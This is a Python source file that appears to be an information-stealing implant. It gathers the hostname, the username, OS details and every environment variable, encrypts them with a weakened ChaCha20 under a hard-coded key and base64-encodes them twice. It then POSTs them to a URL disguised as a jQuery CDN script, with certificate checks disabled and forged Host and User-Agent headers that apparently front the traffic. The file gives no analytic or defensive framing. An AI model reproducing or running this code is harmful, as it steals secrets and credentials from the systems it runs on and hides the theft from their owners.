import os
import platform
import urllib.parse
import ssl
import urllib.request
import base64
import struct

def yield_chacha20_xor_stream(key, iv, position=0):
  if not isinstance(position, int):
    raise TypeError
  if position & ~0xffffffff:
    raise ValueError('Position is not uint32.')
  if not isinstance(key, bytes):
    raise TypeError
  if not isinstance(iv, bytes):
    raise TypeError
  if len(key) != 32:
    raise ValueError
  if len(iv) != 8:
    raise ValueError

  def rotate(v, c):
    return ((v << c) & 0xffffffff) | v >> (32 - c)

  def quarter_round(x, a, b, c, d):
    x[a] = (x[a] + x[b]) & 0xffffffff
    x[d] = rotate(x[d] ^ x[a], 16)
    x[c] = (x[c] + x[d]) & 0xffffffff
    x[b] = rotate(x[b] ^ x[c], 12)
    x[a] = (x[a] + x[b]) & 0xffffffff
    x[d] = rotate(x[d] ^ x[a], 8)
    x[c] = (x[c] + x[d]) & 0xffffffff
    x[b] = rotate(x[b] ^ x[c], 7)

  ctx = [0] * 16
  ctx[:4] = (1634760805, 857760878, 2036477234, 1797285236)
  ctx[4 : 12] = struct.unpack('<8L', key)
  ctx[12] = ctx[13] = position
  ctx[14 : 16] = struct.unpack('<LL', iv)
  while 1:
    x = list(ctx)
    for i in range(3): #decreased from 10 to 6
      quarter_round(x, 0, 4,  8, 12)
      quarter_round(x, 1, 5,  9, 13)
      quarter_round(x, 2, 6, 10, 14)
      quarter_round(x, 3, 7, 11, 15)
      quarter_round(x, 0, 5, 10, 15)
      quarter_round(x, 1, 6, 11, 12)
      quarter_round(x, 2, 7,  8, 13)
      quarter_round(x, 3, 4,  9, 14)
    for c in struct.pack('<16L', *(
        (x[i] + ctx[i]) & 0xffffffff for i in range(16))):
      yield c
    ctx[12] = (ctx[12] + 1) & 0xffffffff
    if ctx[12] == 0:
      ctx[13] = (ctx[13] + 1) & 0xffffffff


def encrypt(data, key, iv=None, position=0):
  if not isinstance(data, bytes):
    raise TypeError
  if iv is None:
    iv = b'\0' * 8
  if isinstance(key, bytes):
    if not key:
      raise ValueError('Key is empty.')
    if len(key) < 32:
      key = (key * (32 // len(key) + 1))[:32]
    if len(key) > 32:
      raise ValueError('Key too long.')

  return bytes(a ^ b for a, b in
      zip(data, yield_chacha20_xor_stream(key, iv, position)))

def get_environment_variables():
    try:
        return dict(os.environ)
    except Exception:
        return None
        
def collect():
    hostname = platform.node()
    username = os.getlogin()
    system = platform.system()
    release = platform.release()
    version = platform.version()
    architecture = platform.architecture()[0]
    info = {
        "hostname": hostname,
        "username": username,
        "system": system,
        "release": release,
        "version": version,
        "environment_vars": get_environment_variables(),
    }
    return urllib.parse.urlencode({k: v for k, v in info.items() if v is not None}).encode('utf-8')

def info(url,out):
    gcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    gcontext.check_hostname = False
    gcontext.verify_mode = ssl.CERT_NONE

    b64 = base64.b64encode(base64.b64encode(out)).decode()
    data = {"m":b64}
    request = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), method='POST', headers={'User-Agent': "Airtable 1.0/Bot", "Host": "airtable.azureedge.net", "Content-Type": "application/x-www-form-urlencoded"})
    try:
        urllib.request.urlopen(request, context=gcontext,timeout=10)
    except:
        return

def hello():
    key = "63beecac597eca13a35f742b0f374c05".encode()
    iv = "9fc46cd7".encode()
    info("https://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.2.min.js",encrypt(collect(), key, iv))